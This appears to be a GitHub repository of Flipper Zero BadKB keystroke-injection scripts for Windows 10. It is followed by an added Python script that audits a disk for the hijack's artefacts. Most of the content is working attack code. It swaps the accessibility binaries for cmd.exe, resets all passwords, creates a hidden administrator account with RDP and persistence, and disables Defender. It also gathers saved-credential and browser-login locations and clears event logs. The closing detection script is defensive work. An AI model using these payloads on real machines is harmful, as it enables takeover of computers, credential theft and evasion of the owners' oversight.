├── README.md
├── config.txt
├── post-exploited-Win10.txt
├── eraser-fingers-Win10.txt
└── Win10-UserPass-Remover.txt

/README.md:
--------------------------------------------------------------------------------
# Win10-Deity
Script for removing a user or admin password on Win10 using BadKB on the Momentum firmware for Flipper Zero.

# Use in laboratory work
# Execution sequence:

Preparation: connect a Flipper Zero to the Win10 PC (Win10 in recovery mode, booted from a Win10 recovery flash drive)
Execution: run Win10-UserPass-Remover.txt via BadKB (Flipper Zero Momentum)

# Post-operation: post-exploited-Win10.txt (reboot to normal mode, start the script on the login screen)

# Cleaning: eraser-fingers-Win10.txt (after completing the test)

# Logging and reporting:

All actions are logged in C:\Windows\Temp\pentest.log
Collected information in C:\Windows\Temp\harvest.txt
System information in C:\Windows\Temp\sysinfo.txt
--------------------------------------------------------------------------------

/config.txt:
--------------------------------------------------------------------------------
REM ================================================================
REM Configuration File for Advanced Windows Reset
REM Modify these values according to your lab requirements
REM ================================================================

REM === BASIC SETTINGS ===
DEFINE NEW_PASSWORD 123456
DEFINE BACKDOOR_USER $lab$admin$
DEFINE BACKDOOR_PASS Fl1pp3r2024!

REM === TIMING SETTINGS (milliseconds) ===
DEFINE DELAY_RECOVERY 3000
DEFINE DELAY_COMMAND 1000
DEFINE DELAY_LONG 2000

REM === FILE SETTINGS ===
DEFINE LOG_FILE pentest_log.txt
DEFINE HARVEST_FILE harvest.txt
DEFINE SYSINFO_FILE sysinfo.txt

REM === FEATURE FLAGS (1=enabled, 0=disabled) ===
DEFINE ENABLE_RDP 1
DEFINE DISABLE_DEFENDER 1
DEFINE ENABLE_PERSISTENCE 1
DEFINE ENABLE_HARVEST 1
DEFINE ENABLE_LOGGING 1
--------------------------------------------------------------------------------

/post-exploited-Win10.txt:
--------------------------------------------------------------------------------
REM ================================================================
REM Post-Exploitation Script - Run after successful login
REM Advanced system compromise and data collection
REM ================================================================

DELAY 2000

REM Open elevated command prompt multiple ways
GUI u
DELAY 1500

REM Execute advanced reset script
STRING cd /d C:\Windows\Temp\ && advanced_reset.bat
ENTER
DELAY 3000

REM === ADVANCED POST-EXPLOITATION ===

REM Enable RDP
STRING reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
STRING netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
ENTER

REM Disable Windows Defender (for lab environment)
STRING reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
ENTER
STRING reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
ENTER

REM Create advanced backdoor service
STRING sc create "WindowsUpdateService" binpath="cmd.exe /k net user $BACKDOOR_USER$ /active:yes" start=auto
ENTER

REM Gather sensitive information
STRING echo === CREDENTIAL HARVEST === > C:\Windows\Temp\harvest.txt
ENTER
STRING dir C:\Users\*\Desktop\*.txt /s >> C:\Windows\Temp\harvest.txt 2>nul
ENTER
STRING dir C:\Users\*\Documents\password* /s >> C:\Windows\Temp\harvest.txt 2>nul
ENTER
STRING cmdkey /list >> C:\Windows\Temp\harvest.txt 2>nul
ENTER

REM Network discovery
STRING echo === NETWORK RECONNAISSANCE === >> C:\Windows\Temp\harvest.txt
ENTER
STRING ipconfig /all >> C:\Windows\Temp\harvest.txt
ENTER
STRING net view >> C:\Windows\Temp\harvest.txt 2>nul
ENTER
STRING net use >> C:\Windows\Temp\harvest.txt 2>nul
ENTER
STRING net share >> C:\Windows\Temp\harvest.txt 2>nul
ENTER

REM Browser credential extraction locations
STRING echo === BROWSER DATA LOCATIONS === >> C:\Windows\Temp\harvest.txt
ENTER
STRING dir "C:\Users\*\AppData\Local\Google\Chrome\User Data\Default\Login Data" /s >> C:\Windows\Temp\harvest.txt 2>nul
ENTER
STRING dir "C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*.default*\logins.json" /s >> C:\Windows\Temp\harvest.txt 2>nul
ENTER

REM System persistence check
STRING echo === PERSISTENCE STATUS === >> C:\Windows\Temp\harvest.txt
ENTER
STRING schtasks /query | findstr $BACKDOOR_USER$ >> C:\Windows\Temp\harvest.txt 2>nul
ENTER
STRING net user $BACKDOOR_USER$ >> C:\Windows\Temp\harvest.txt 2>nul
ENTER

STRING echo Advanced post-exploitation completed.
ENTER
STRING echo Check C:\Windows\Temp\ for collected data.
ENTER

DELAY 2000
ALT F4
--------------------------------------------------------------------------------

/eraser-fingers-Win10.txt:
--------------------------------------------------------------------------------
REM ================================================================
REM Cleanup and Restoration Script
REM Removes traces and restores original system state
REM ================================================================

DELAY 1000

REM Open elevated command prompt
GUI r
DELAY 500
STRING powershell
CTRL SHIFT ENTER
DELAY 2000
LEFT
ENTER
DELAY 2000

REM === COMPREHENSIVE CLEANUP ===

REM Stop and remove backdoor service
STRING Stop-Service "WindowsUpdateService" -Force -ErrorAction SilentlyContinue
ENTER
STRING Remove-Service "WindowsUpdateService" -ErrorAction SilentlyContinue
ENTER

REM Remove backdoor user
STRING Remove-LocalUser -Name "$BACKDOOR_USER$" -ErrorAction SilentlyContinue
ENTER

REM Restore original system files
STRING $drives = @('C', 'D', 'E', 'F')
ENTER
STRING foreach ($drive in $drives) {
ENTER
STRING $path = "${drive}:\Windows\System32"
ENTER
STRING if (Test-Path "$path\utilman.exe.bak") {
ENTER
STRING Copy-Item "$path\utilman.exe.bak" "$path\utilman.exe" -Force
ENTER
STRING Remove-Item "$path\utilman.exe.bak" -Force
ENTER
STRING }
ENTER
STRING if (Test-Path "$path\sethc.exe.bak") {
ENTER
STRING Copy-Item "$path\sethc.exe.bak" "$path\sethc.exe" -Force
ENTER
STRING Remove-Item "$path\sethc.exe.bak" -Force
ENTER
STRING }
ENTER
STRING if (Test-Path "$path\osk.exe.bak") {
ENTER
STRING Copy-Item "$path\osk.exe.bak" "$path\osk.exe" -Force
ENTER
STRING Remove-Item "$path\osk.exe.bak" -Force
ENTER
STRING }
ENTER
STRING }
ENTER

REM Clean temporary files
STRING Remove-Item "C:\Windows\Temp\advanced_reset.bat" -ErrorAction SilentlyContinue
ENTER
STRING Remove-Item "C:\Windows\Temp\persist.bat" -ErrorAction SilentlyContinue
ENTER
STRING Remove-Item "C:\Windows\Temp\harvest.txt" -ErrorAction SilentlyContinue
ENTER
STRING Remove-Item "C:\Windows\Temp\sysinfo.txt" -ErrorAction SilentlyContinue
ENTER
STRING Remove-Item "C:\Windows\Temp\pentest.log" -ErrorAction SilentlyContinue
ENTER
STRING Remove-Item "C:\Windows\Temp\$BACKDOOR_USER$.txt" -ErrorAction SilentlyContinue
ENTER

REM Restore Windows Defender (if disabled)
STRING Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -ErrorAction SilentlyContinue
ENTER
STRING Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -ErrorAction SilentlyContinue
ENTER

REM Clear event logs (for lab environment)
STRING wevtutil cl System
ENTER
STRING wevtutil cl Security
ENTER
STRING wevtutil cl Application
ENTER

STRING Write-Host "Cleanup completed. System restored to original state." -ForegroundColor Green
ENTER

STRING exit
ENTER
--------------------------------------------------------------------------------

/Win10-UserPass-Remover.txt:
--------------------------------------------------------------------------------
REM ================================================================
REM Advanced Windows 10 Password Reset & Backdoor Installation
REM For Flipper Zero Momentum Firmware - Lab/Educational Use Only
REM Version: 2.0 | Author: KL3FT3Z (https://github.com/toxy4ny)
REM ================================================================

REM === CONFIGURATION SECTION ===
DEFINE NEW_PASSWORD 123456
DEFINE BACKDOOR_USER $lab$admin$
DEFINE BACKDOOR_PASS Fl1pp3r2024!
DEFINE LOG_FILE pentest_log.txt
DEFINE DELAY_RECOVERY 3000
DEFINE DELAY_COMMAND 1000

REM === STAGE 1: RECOVERY MODE NAVIGATION ===
DELAY $DELAY_RECOVERY$

REM Navigate to recovery options
TAB
TAB
ENTER
DELAY 2000

REM Troubleshoot -> Advanced options -> Command Prompt
ENTER
DELAY 1500
ENTER
DELAY 1500
DOWN
DOWN
ENTER
DELAY 3000

REM === STAGE 2: SYSTEM DETECTION & BACKUP ===
STRING echo [%TIME%] Starting advanced Windows penetration test > %TEMP%\$LOG_FILE$
ENTER
DELAY 500

REM Multi-drive Windows detection with logging
STRING for %%d in (C D E F G H) do (
ENTER
STRING if exist %%d:\Windows\System32\utilman.exe (
ENTER
STRING echo [%TIME%] Windows installation found on %%d: >> %TEMP%\$LOG_FILE$
ENTER
STRING echo Found Windows on %%d: - Creating backup...
ENTER
STRING copy %%d:\Windows\System32\utilman.exe %%d:\Windows\System32\utilman.exe.bak
ENTER
STRING copy %%d:\Windows\System32\sethc.exe %%d:\Windows\System32\sethc.exe.bak
ENTER
STRING copy %%d:\Windows\System32\osk.exe %%d:\Windows\System32\osk.exe.bak
ENTER
STRING echo %%d > %TEMP%\target_drive.txt
ENTER
STRING set WDRIVE=%%d
ENTER
STRING goto :exploit
ENTER
STRING )
ENTER
STRING )
ENTER
STRING echo No Windows installation found!
ENTER
STRING pause
ENTER
STRING goto :end
ENTER

STRING :exploit
ENTER

REM === STAGE 3: MULTIPLE BACKDOOR INSTALLATION ===
STRING echo [%TIME%] Installing multiple backdoors >> %TEMP%\$LOG_FILE$
ENTER

REM Backdoor 1: utilman.exe replacement
STRING copy /Y %WDRIVE%:\Windows\System32\cmd.exe %WDRIVE%:\Windows\System32\utilman.exe
ENTER

REM Backdoor 2: Sticky Keys (sethc.exe)
STRING copy /Y %WDRIVE%:\Windows\System32\cmd.exe %WDRIVE%:\Windows\System32\sethc.exe
ENTER

REM Backdoor 3: On-Screen Keyboard
STRING copy /Y %WDRIVE%:\Windows\System32\cmd.exe %WDRIVE%:\Windows\System32\osk.exe
ENTER

REM === STAGE 4: REGISTRY MANIPULATION ===
STRING echo [%TIME%] Modifying registry for persistence >> %TEMP%\$LOG_FILE$
ENTER

REM Load system registry hive
STRING reg load HKLM\TEMP_SYSTEM %WDRIVE%:\Windows\System32\config\SYSTEM
ENTER

REM Enable built-in Administrator
STRING reg add "HKLM\TEMP_SYSTEM\Setup" /v "CmdLine" /t REG_SZ /d "cmd.exe /k net user Administrator /active:yes" /f
ENTER

REM Unload registry hive
STRING reg unload HKLM\TEMP_SYSTEM
ENTER

REM === STAGE 5: PREPARE ADVANCED PAYLOAD ===
STRING echo [%TIME%] Creating advanced payload script >> %TEMP%\$LOG_FILE$
ENTER

REM Create sophisticated password reset script
STRING echo @echo off > %WDRIVE%:\Windows\Temp\advanced_reset.bat
ENTER
STRING echo echo [%%TIME%%] Advanced Password Reset Started >> %WDRIVE%:\Windows\Temp\pentest.log 2^>^&1 >> %WDRIVE%:\Windows\Temp\advanced_reset.bat
ENTER

REM Add comprehensive user enumeration and password reset
STRING echo for /f "tokens=1" %%u in ('net user ^| findstr /v "command completed successfully" ^| findstr /v "^-" ^| findstr /v "accounts for" ^| findstr /v "^The command" ^| findstr /v "^$"') do ( >> %WDRIVE%:\Windows\Temp\advanced_reset.bat
ENTER
STRING echo echo Resetting password for: %%u >> %WDRIVE%:\Windows\Temp\advanced_reset.bat
ENTER
STRING echo net user "%%u" "$NEW_PASSWORD$" 2^>nul ^|^| echo Failed to reset %%u >> %WDRIVE%:\Windows\Temp\advanced_reset.bat
ENTER
STRING echo ^) >> %WDRIVE%:\Windows\Temp\advanced_reset.bat
ENTER

REM Add backdoor user creation
STRING echo net user "$BACKDOOR_USER$" "$BACKDOOR_PASS$" /add /comment:"System Support Account" 2^>nul >> %WDRIVE%:\Windows\Temp\advanced_reset.bat
ENTER
STRING echo net localgroup administrators "$BACKDOOR_USER$" /add 2^>nul >> %WDRIVE%:\Windows\Temp\advanced_reset.bat
ENTER
STRING echo net localgroup "Remote Desktop Users" "$BACKDOOR_USER$" /add 2^>nul >> %WDRIVE%:\Windows\Temp\advanced_reset.bat
ENTER

REM Add system information gathering
STRING echo echo System Information: >> %WDRIVE%:\Windows\Temp\advanced_reset.bat
ENTER
STRING echo systeminfo ^| findstr /i "domain" >> %WDRIVE%:\Windows\Temp\advanced_reset.bat
ENTER
STRING echo net localgroup administrators >> %WDRIVE%:\Windows\Temp\advanced_reset.bat
ENTER

REM === STAGE 6: PERSISTENCE MECHANISMS ===
STRING echo [%TIME%] Installing persistence mechanisms >> %TEMP%\$LOG_FILE$
ENTER

REM Create startup persistence script
STRING echo @echo off > %WDRIVE%:\Windows\Temp\persist.bat
ENTER
STRING echo if not exist "%WDRIVE%:\Windows\Temp\$BACKDOOR_USER$.txt" ( >> %WDRIVE%:\Windows\Temp\persist.bat
ENTER
STRING echo net user "$BACKDOOR_USER$" "$BACKDOOR_PASS$" /add 2^>nul >> %WDRIVE%:\Windows\Temp\persist.bat
ENTER
STRING echo net localgroup administrators "$BACKDOOR_USER$" /add 2^>nul >> %WDRIVE%:\Windows\Temp\persist.bat
ENTER
STRING echo echo persistent > "%WDRIVE%:\Windows\Temp\$BACKDOOR_USER$.txt" >> %WDRIVE%:\Windows\Temp\persist.bat
ENTER
STRING echo ^) >> %WDRIVE%:\Windows\Temp\persist.bat
ENTER

REM === STAGE 7: SYSTEM INFORMATION COLLECTION ===
STRING echo [%TIME%] Collecting system information >> %TEMP%\$LOG_FILE$
ENTER

REM Gather system details for later analysis
STRING echo echo === SYSTEM RECONNAISSANCE === > %WDRIVE%:\Windows\Temp\sysinfo.txt
ENTER
STRING dir %WDRIVE%:\Users >> %WDRIVE%:\Windows\Temp\sysinfo.txt
ENTER
STRING type %WDRIVE%:\Windows\System32\config\SAM 2^>nul ^| find /c ":" >> %WDRIVE%:\Windows\Temp\sysinfo.txt
ENTER

REM === STAGE 8: COMPLETION AND REBOOT ===
STRING echo [%TIME%] Payload installation completed >> %TEMP%\$LOG_FILE$
ENTER
STRING echo.
ENTER
STRING echo ========================================
ENTER
STRING echo ADVANCED WINDOWS PENETRATION COMPLETE
ENTER
STRING echo ========================================
ENTER
STRING echo Backdoors installed:
ENTER
STRING echo - Accessibility tools (Win+U, 5x Shift, Win+Ctrl+O)
ENTER
STRING echo - Registry persistence enabled
ENTER
STRING echo - Backdoor user: $BACKDOOR_USER$
ENTER
STRING echo - Default password: $NEW_PASSWORD$
ENTER
STRING echo.
ENTER
STRING echo System will reboot in 10 seconds...
ENTER

STRING timeout 10
ENTER

STRING :end
ENTER
STRING wpeutil reboot
ENTER
--------------------------------------------------------------------------------
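The artefacts these scripts leave behind are easy to audit from the defender's side: an accessibility helper (utilman.exe, sethc.exe, osk.exe) that hashes identically to cmd.exe, a matching `.bak` copy of the original sitting beside it, and the helper files dropped in Windows\Temp (advanced_reset.bat, persist.bat, harvest.txt, sysinfo.txt, pentest.log). The following script is an added example and is not part of the Win10-Deity repository. It audits a Windows root directory offline (a mounted image or, with an elevated shell, a live C:\) and reports those three indicators; the `audit_windows_root` and `build_sample_root` names are this example's own, and the sample tree it builds is constructed here so the check runs without a real Windows install.

```python
"""
Offline integrity audit for the accessibility-binary hijack described above.
Added example, not part of the Win10-Deity repository. Checks three things
under a Windows root: accessibility helpers that are byte-for-byte copies of
cmd.exe, leftover .bak copies of the originals, and helper files dropped in
Windows\Temp. The sample tree below is constructed for the demo.
"""
import hashlib
import tempfile
from pathlib import Path

# Accessibility helpers that the page's script overwrites with cmd.exe.
ACCESSIBILITY_BINARIES = ("utilman.exe", "sethc.exe", "osk.exe")

# File names the page's scripts drop in Windows\Temp (taken from the page).
DROPPED_TEMP_FILES = (
    "advanced_reset.bat", "persist.bat", "harvest.txt",
    "sysinfo.txt", "pentest.log",
)


def sha256_of(path: Path) -> str:
    """Hash a file in 64 KiB chunks so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def audit_windows_root(root: Path) -> list[str]:
    """Return human-readable findings for the Windows installation under root.

    root is the directory containing the 'Windows' folder, e.g. the mount
    point of a disk image. Reading System32 on a live host needs elevation.
    """
    findings: list[str] = []
    system32 = root / "Windows" / "System32"
    cmd_exe = system32 / "cmd.exe"
    if not cmd_exe.is_file():
        findings.append(f"cmd.exe not found under {system32}; cannot compare")
        return findings
    cmd_hash = sha256_of(cmd_exe)

    for name in ACCESSIBILITY_BINARIES:
        target = system32 / name
        # A genuine accessibility tool never hashes identical to cmd.exe.
        if target.is_file() and sha256_of(target) == cmd_hash:
            findings.append(f"{name} is a byte-for-byte copy of cmd.exe")
        # The page's script keeps the original next to the replacement.
        backup = system32 / f"{name}.bak"
        if backup.is_file():
            findings.append(f"backup of original present: {backup.name}")

    temp_dir = root / "Windows" / "Temp"
    for name in DROPPED_TEMP_FILES:
        if (temp_dir / name).is_file():
            findings.append(f"dropped helper file present: Windows\\Temp\\{name}")
    return findings


def build_sample_root(base: Path) -> Path:
    """Construct a fake post-compromise tree (constructed sample, not real data)."""
    system32 = base / "Windows" / "System32"
    temp_dir = base / "Windows" / "Temp"
    system32.mkdir(parents=True)
    temp_dir.mkdir(parents=True)
    fake_cmd = b"MZ-fake-cmd-contents"
    (system32 / "cmd.exe").write_bytes(fake_cmd)
    (system32 / "utilman.exe").write_bytes(fake_cmd)          # hijacked
    (system32 / "utilman.exe.bak").write_bytes(b"MZ-fake-utilman")
    (system32 / "sethc.exe").write_bytes(fake_cmd)            # hijacked
    (system32 / "sethc.exe.bak").write_bytes(b"MZ-fake-sethc")
    (system32 / "osk.exe").write_bytes(b"MZ-fake-osk")        # untouched
    (temp_dir / "persist.bat").write_text("@echo off\n")
    return base


def run_demo() -> list[str]:
    """Build the constructed sample tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_windows_root(build_sample_root(Path(tmp)))


if __name__ == "__main__":
    for finding in run_demo():
        print("FINDING:", finding)
```

Against the constructed tree the audit reports five findings (two hijacked binaries, their two `.bak` originals, and persist.bat) and nothing for the untouched osk.exe. Hash comparison against cmd.exe is deliberate: it does not depend on a catalogue of known-good hashes for each Windows build, and it also catches the case where the `.bak` files have already been removed by the cleanup script.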